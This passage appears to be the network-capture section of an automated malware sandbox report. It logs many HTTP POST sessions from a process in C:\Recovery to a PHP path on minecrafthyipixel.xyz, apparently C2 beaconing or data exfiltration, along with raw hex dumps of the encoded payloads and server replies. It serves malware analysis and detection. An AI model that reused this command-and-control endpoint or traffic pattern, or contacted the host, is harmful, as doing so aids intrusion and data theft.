                                                                                                                                    Apr 19, 2024 13:43:45.621064901 CEST2512OUTData Raw: 57 5c 5e 5f 59 45 54 54 5c 5e 59 59 57 52 58 5f 54 5a 5f 57 54 5b 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^_YETT\^YYWRX_TZ_WT[S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&.%!,]$V$$]"=;?_%$+&R4U=?\"? :5$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:45.880753994 CEST633INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:45 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlmWJ7IoxJ%2BhLi%2FQMVY75QiU%2BvtkV%2B%2FOrGYyAemOpCayq7zj15ur%2BEiYt%2BjoveuZilZIO84h3L%2Fwgep%2FwwWE1mlvzI0Q2OUzRjwCfzGlSwUqVwqMp8n%2BBiID0HzNKQyP38V6GiWqdXA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca385de0a458f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:45.880781889 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    113192.168.2.449864104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:46.127741098 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:46.232368946 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:46.232537031 CEST2512OUTData Raw: 52 5d 5b 5c 5c 46 54 54 5c 5e 59 59 57 56 58 5d 54 5a 5f 57 54 55 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R][\\FTT\^YYWVX]TZ_WTUSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%X>S +Z'0$;=V)7Y2)(V%6Q 1>($#,<[-$[. X !
                                                                                                                                    Apr 19, 2024 13:43:46.503349066 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:46 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oAGyyqg%2B8pkSTvQ9Zp0SYUiGEqN6%2B6ANx8q5Dxa9EcYVC8TC%2Bw6RS9PAh7z0xy0gfjjLNHDL6QjunyTYhUWhjMgu6Y0vt0wsUaP%2B%2FVC14iwW7NHgsQ6ZL8mvDcG6Zq8TDzJ%2FIzYW2Pc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca389aa1e53ff-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:46.503376007 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    114192.168.2.449865104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:46.733078957 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:46.838105917 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:46.838356972 CEST2512OUTData Raw: 57 55 5b 5e 59 47 54 5b 5c 5e 59 59 57 54 58 5c 54 56 5f 5c 54 5a 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[^YGT[\^YYWTX\TV_\TZS^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2>V5;/3%;=2:$%("P7.U*']4'9$[. X )
                                                                                                                                    Apr 19, 2024 13:43:47.201931000 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:47 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ych6cQB%2F1MzxLcCf%2FoxeYNg%2B6uOgO8AYmRRA4kwoZ87dKqlthLKI5ivI%2FmXXNU1n4IDkzibf55zu0UkfBhLv%2Bb3C9303cC%2F5Qh14CMKotz7C22RRSrroPZPnz9g0y2Hw%2FZ1YX5rxHXA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca38d6c00ad5f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:47.201961994 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    115192.168.2.449866104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:47.424376011 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:47.529381037 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:47.529648066 CEST2504OUTData Raw: 57 5c 5b 5c 59 45 54 5b 5c 5e 59 59 57 57 58 5c 54 55 5f 56 54 5d 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[\YET[\^YYWWX\TU_VT]SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%& ++$8$)Q=(3Y1?1+4>=; 7?<\:$[. X
                                                                                                                                    Apr 19, 2024 13:43:47.793946028 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:47 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zvR2KUpKpXSoZ7F9vYBgtSL2eXBt7GDa8WnoPmeL5Z%2Bqg3zRZWcdDMLcGp4tOtKthyoDjv4t8B2XKtGG0AOXje%2B8Sa3b9bVmazTSoeWEaHo5%2FVYMGfMHTPTpYIPw6t%2FoWLJTYdQVCtQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca391b8914505-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:47.793972015 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    116192.168.2.449867104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:48.033082962 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:48.137466908 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:48.137840033 CEST2512OUTData Raw: 57 5d 5e 5d 5c 47 51 5d 5c 5e 59 59 57 5f 58 53 54 50 5f 5d 54 58 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^]\GQ]\^YYW_XSTP_]TXS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&.%"8#07\$-W?8\18R%(.R#1)'[ #/%$[. X
                                                                                                                                    Apr 19, 2024 13:43:48.503964901 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:48 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OXF%2BuHT67Pujp8dIJnfFFN2QYM8OQVIK6ejv1R1%2FIkkVMHjGH66IIQV5g8%2FvzaoRfBe2S0%2F7M9F3TTJ6j8lVuA6XrDFDRWKIT5r0C0Nky7hDoRrp0qZtzh46nDmXm44Wv34txuu0tlo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3958b821357-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:48.504029036 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    117192.168.2.449868104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:48.735728979 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:48.840141058 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:48.840322018 CEST2512OUTData Raw: 52 59 5e 5e 5c 47 54 5d 5c 5e 59 59 57 53 58 5f 54 5a 5f 5c 54 5c 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^^\GT]\^YYWSX_TZ_\T\SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\&% +4Y$#7_%(-V*+8')$V16R712V>8 ,//%$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:49.209698915 CEST615INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:49 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iNP8rDNLfyX2NbbjMTZqwkMVYfth6tTMmvvVCY2wCeQRONGiHUE57mE0YWVqwC3RPchhWgGooL7GGsyhTClMnULlm1dwcNgLPgmNkH2KF3%2F7KEe3acsmrN31N3HCWmhrCW9wIxoeJok%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca399edd953b6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:49.209764004 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    118192.168.2.449869104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:49.255491972 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2180
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:49.359958887 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:49.360155106 CEST2180OUTData Raw: 57 5e 5b 5e 5c 43 54 5f 5c 5e 59 59 57 57 58 5c 54 55 5f 5e 54 58 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^[^\CT_\^YYWWX\TU_^TXSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>&!;Y$%(5V=^#X2)+$(*4"V='4/.$[. X
                                                                                                                                    Apr 19, 2024 13:43:49.632520914 CEST772INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:49 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zujVP3G%2BlbKXmoJ0QlL4%2FaPQvkk5MqbECDVlQdTsk2qGGxrEpHr0TJSWjo5tG9CiCU8nDDjNJZAUZky%2BwyDrD%2FwTAV3e3XWoYaesI1xaPA4cjNKVUETE5rUnqXwmXd3oq7Hn9%2FoKFZE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca39d2ac67bd8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 59 30 25 2a 14 35 2a 06 04 3e 30 3a 13 2a 0e 21 5c 2a 07 35 16 23 2e 37 0e 38 03 24 5a 3c 05 00 5f 31 33 3e 0b 27 3e 38 53 31 0a 21 59 00 1a 39 5f 23 3c 3d 5b 2d 5f 2e 02 2b 1f 0f 5e 34 0b 27 14 3f 2e 3d 52 21 28 2c 06 3c 2d 29 53 2d 28 2c 57 28 16 26 06 3b 34 25 00 22 11 2c 52 09 12 26 0b 2b 28 06 5b 26 20 0b 1d 23 31 2f 00 28 3c 32 59 24 5d 2c 1f 25 20 24 5f 2d 22 0c 55 32 2e 21 56 3d 29 2c 1e 37 2f 3d 14 31 3e 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$Y0%*5*>0:*!\*5#.78$Z<_13>'>8S1!Y9_#<=[-_.+^4'?.=R!(,<-)S-(,W(&;4%",R&+([& #1/(<2Y$],% $_-"U2.!V=),7/=1>.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:43:49.632580042 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    119192.168.2.449870104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:49.453049898 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:49.557626963 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:49.557785034 CEST2512OUTData Raw: 52 5a 5e 54 5c 41 51 58 5c 5e 59 59 57 54 58 59 54 5b 5f 5e 54 55 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^T\AQX\^YYWTXYT[_^TUSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&X2U"+(X038%;?;#2(%+!7=)#7/3:$[. X )
                                                                                                                                    Apr 19, 2024 13:43:49.818070889 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:49 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=snQEkAB71uX0E%2B2%2B0XeKY2doGKEmUXwg1zDl6JqryfJBjOxHOpLg3eDuRKzx0TJAaAK%2BVuBTIHRPymWToVzWpjYl%2BYPmSRz3xkqXOA7ZtfN14ceQ71TELOd2mXrOwfrGHsxUgrWvtps%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca39e6bd7ada4-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:49.818130970 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    120192.168.2.449871104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:50.047776937 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:50.154071093 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:50.154275894 CEST2512OUTData Raw: 57 5a 5b 5b 59 42 51 58 5c 5e 59 59 57 56 58 53 54 56 5f 5d 54 5f 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[[YBQX\^YYWVXSTV_]T_SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z2!!+4Z$3+'-W>;\'*'2;>R!1"W>+#?,\9$[. X !
                                                                                                                                    Apr 19, 2024 13:43:50.525952101 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:50 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f7jwgWDRwFCPcRdGAda16iDa15PyBHQ44cxX9o4cpuWK8LVaZUSljuW45T3XwcB651WIQb%2FO%2BsC3fr3UelonatJ5x1uhqEP4aJ21ZT1KHpyTqrH0yZdT5VlyudgMrVjxP94oHlIVx8k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3a229d08bb7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:50.526015043 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    121192.168.2.449872104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
